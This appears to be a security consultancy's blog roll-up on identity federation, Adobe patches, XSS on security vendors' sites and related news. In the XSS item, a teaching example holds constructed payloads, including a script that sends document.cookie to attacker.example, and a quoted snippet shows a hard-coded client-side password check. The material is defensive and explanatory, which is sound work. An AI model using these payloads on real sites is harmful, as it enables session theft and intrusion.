Enabling Secure Business Operations

Microsoft Geneva overcoming Identity Management Hurdles

Les Jordan from Microsoft recently wrote a blog post entitled Identity Management: a key to seamless CTMS and EDC. In it, he presents some of the solutions Microsoft is introducing in the identity management space, currently grouped under the name Microsoft Geneva, including the Geneva Framework and the Microsoft Identity Federation Gateway.

The idea is fairly simple. Many (most?) large enterprises already manage their users and systems with Active Directory. Geneva lets an enterprise expose only the parts of its Active Directory that identity federation on the Internet requires: a security token service issues signed tokens carrying claims (user attributes such as name, e-mail address, or group membership) derived from the directory, and a partner's applications consume those claims instead of maintaining their own accounts for the same people. The tokens and protocols are standards-based (WS-* and SAML 2.0), so claims can be exchanged between enterprises running different software.

…the issue of Identity Management, Username and Password proliferation, and cross-company collaboration is an issue that has hindered true (and secure) data availability and collaboration in the Life Sciences industry.  Perhaps now we can get the Identity Management issue behind us and move on.

Whether or not Geneva becomes the one standard way to achieve interoperable identity management across enterprises in the life sciences space, it will clearly lower barriers between organizations and increase the trust we can place in digital identities.

Adobe Digital Signature Survey

Adobe has posted a survey for digital signature users on their Security Matters blog.

If you have (and use) an electronic signature credential, and are interested in helping Adobe craft the next generation of Adobe Acrobat, Reader, and LiveCycle products and signature features, we are offering you the ability to participate in an Electronic Signature Survey.

Might be worth filling out, if you want to have a chance to influence the next round of Adobe products, such as Acrobat.

Critical Acrobat Reader Vulnerability

Hot on the heels of a Flash Player critical vulnerability, Adobe has released a security bulletin outlining a critical vulnerability in all Adobe Reader and Acrobat versions prior to version 8.1.3.

Critical vulnerabilities have been identified in Adobe Reader and Acrobat 8.1.2 and earlier versions. These vulnerabilities would cause the application to crash and could potentially allow an attacker to take control of the affected system.

Acrobat and Reader 9 are not vulnerable to these particular flaws. A few things are worth noting. No patch has been released for Acrobat/Reader 7 and earlier. The fix is available only by moving to a new version, either 8.1.3 or 9; Adobe has not published a security-only patch that can be applied to an installed copy. This may cause significant pain for organizations that have standardized on a specific Acrobat or Reader version, especially in FDA-validated systems, because the new version may carry other changes along with the fix: a changed user interface, changed behavior, and changed compatibility. I therefore expect some organizations to choose to live with the risk rather than re-document and re-validate their processes against an updated version of Acrobat or Reader.

Critical Flash Player Update

Adobe has released an advisory about a series of critical vulnerabilities in Flash Player 9.0.124.0 and earlier. The fix is to install the just-released Flash Player 10.0.12.36. The notable part is that the architecture of several security-related features changed substantially in Player 10, so content that worked with 9 may stop working with 10.

Potential vulnerabilities have been identified in Adobe Flash Player 9.0.124.0 and earlier that could allow an attacker who successfully exploits these potential vulnerabilities to bypass Flash Player security controls. Adobe recommends users update to the most current version of Flash Player available for their platform. Due to the possibility that these security enhancements and changes may impact existing content, customers are advised to review this Adobe Developer Center article to determine if their content will be impacted, and to begin implementing necessary changes immediately to help ensure a seamless transition.

The bulletin is here, and the updated player is here.  Happy patching!

Do as we say, not as we do

From DarkReading.com:

With all the talk about hackers launching attacks from legitimate Websites, you’d think that the major security vendors’ sites, at least, would be vulnerability-free.

Not so, according to a report issued yesterday by a security watchdog site.
The site, XSSed, states that it has verified some 30 cross-site scripting vulnerabilities spread across the Websites of three of the industry’s best-known security vendors: McAfee, Symantec, and VeriSign. The vulnerabilities could make it possible for attackers to launch phishing campaigns from these sites or even distribute malware to the companies’ customers, according to XSSed.

Cross-site scripting vulnerabilities aren't a new type of threat, and they aren't particularly difficult to defend against: encode untrusted data for the context it is written into (HTML body, attribute, JavaScript, URL) instead of trying to filter out dangerous strings. It seems a little crazy that the companies that many people depend on to help them get a handle on security don't practice the things that they preach. Or then again, maybe they don't even preach them:
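An added example of that point (not code from DarkReading, XSSed or any of the vendors named): a search page that reflects the query into its markup, the blacklist "fix" that a nested payload walks straight through, and the output-encoding fix that holds. The markup and the attacker payloads are constructed.

```javascript
// Added example, not code from the article or the vendors' sites.
// Reflected XSS in a "search results" page and the two usual responses:
// a blacklist filter (which fails) and HTML-context output encoding (which
// works). Payloads below are constructed.

// Encode the five characters that can break out of an HTML text node or a
// quoted attribute value. (In the browser the equivalent rule is to use
// textContent / setAttribute rather than innerHTML.)
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}

// Vulnerable: raw input interpolated into a text node and an attribute.
function renderVulnerable(query) {
  return '<p>Results for: ' + query + '</p>\n' +
         '<input name="q" value="' + query + '">';
}

// Wrong fix: strip one dangerous tag. A single non-recursive removal can be
// nested around, and it does nothing about event handlers or the attribute
// breakout in the second payload.
function renderBlacklisted(query) {
  const filtered = String(query).replace(/<script>/gi, '');
  return '<p>Results for: ' + filtered + '</p>\n' +
         '<input name="q" value="' + filtered + '">';
}

// Right fix: encode for the HTML context at the point of output. The attribute
// must also be quoted; unquoted, a space alone lets the attacker add attributes.
function renderHardened(query) {
  const safe = escapeHtml(query);
  return '<p>Results for: ' + safe + '</p>\n' +
         '<input name="q" value="' + safe + '">';
}

// Constructed payloads.
const PAYLOAD_TAG = '<script>document.location="http://attacker.example/?c="+document.cookie</script>';
const PAYLOAD_NESTED = '<scr<script>ipt>alert(1)</script>';   // survives one-pass removal
const PAYLOAD_ATTR = '"><img src=x onerror=alert(1)>';         // closes the value attribute
```

The nested payload is the classic demonstration of why removal-based filters fail: after one `<script>` is cut out, the remaining characters reassemble into the tag that was supposedly removed.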

This isn’t the first time that XSS vulnerabilities have been exposed on sites such as McAfee’s and Symantec’s, notes Jeremiah Grossman, CTO of WhiteHat Security. Back in January, XSSed reported that some 60 sites that had received the “hacker safe” label from McAfee’s ScanAlert service were vulnerable to XSS attacks. (Emphasis added)

I disagree, however, with Grossman's conclusion that the XSS vulnerabilities on these security companies' web sites aren't something to worry about. His argument is that, while these are security companies, they primarily focus on anti-virus and anti-malware software. However, once a company starts handing out "Hacker Safe!" badges to other web sites (which, in my opinion, is like throwing rocks at a beehive), it has entered an arena in which something as simple as an XSS vulnerability cannot be overlooked. And I believe the "more important" sites mentioned, such as bank and e-commerce web sites, are unlikely to get their security problems taken care of before the people who are supposed to "know security" take care of their own.

Gemini Security Solutions Joins SAFE-BioPharma Association Vendor Partner Program

From the press release:

“We are pleased to be given this opportunity to be directly supporting SAFE’s mission of delivering unique electronic identity credentials for legally enforceable and regulatory compliant digital signatures across the global biopharmaceutical environment,” said Peter Hesse, President and Founder, Gemini Security Solutions. “We have focused significant energy toward helping corporations realize the benefits of digital signatures and identity management standards to safeguard critical information. We are excited to be recognized both as a SAFE partner and a trusted technical expert.”

We are glad to officially be a part of the SAFE community. While we have been involved in SAFE since its inception, we are now playing a greater part in the development and adoption of secure standards for the biopharmaceutical industry.

Funny “Hacking” Story

The folks over at The Daily WTF have an amusing story about trying to determine if a sales pitch was worth it.

Since there's really only one thing that could cause such a dialog to pop up so fast, I checked the source code…

// Client-side "login": the user id, the password and the protected URL all ship to the browser.
if (form.id.value=="buyers") {
  if (form.pass.value=="gov1996") {
    location="http://officers.federalsuppliers.com/agents.html"
  }
}

Even if you don’t understand Javascript, you can probably appreciate how terrible this implementation is…

Microsoft OneCare Again

This is great. We covered Microsoft OneCare when it was first announced and again when Vista was nearing release. Now comes news from SecurityFocus that Microsoft OneCare deleted Outlook e-mails.

Recent reports suggest Microsoft’s OneCare anti-virus offering suffered a bug that could have caused it to delete or quarantine all e-mail in a user’s Outlook inbox, in certain cases when it finds a virus.

Well, isn't that nice. You have a spam/virus e-mail in your PST, so to get rid of it, we'll just delete the entire PST file. Yikes. Glad they didn't include it in Vista as Anil had suggested.

Here’s a new one

Taking profiteering to a new level:

I got hacked by my own host. No, it wasn’t a mistake. No, the server didn’t just go down. They hacked it so that they could upsell me on some $2000 security audit and package!

“They” turns out to be one individual who worked part-time on support for the hosting provider and also at a security consulting firm. Interesting (but illegal) way of drumming up business…

Come on, we’ve all done it…

Every software developer has done this at some point: you fix a bug and in the process introduce a new one.

Well, it sucks when the bug you are fixing is actually a cumulative patch for eight security vulnerabilities, and the bug you introduce is a security vulnerability as severe as the worst of the eight you fixed.

Oh well, here’s hoping they get this one worked out before exploits show up in the wild.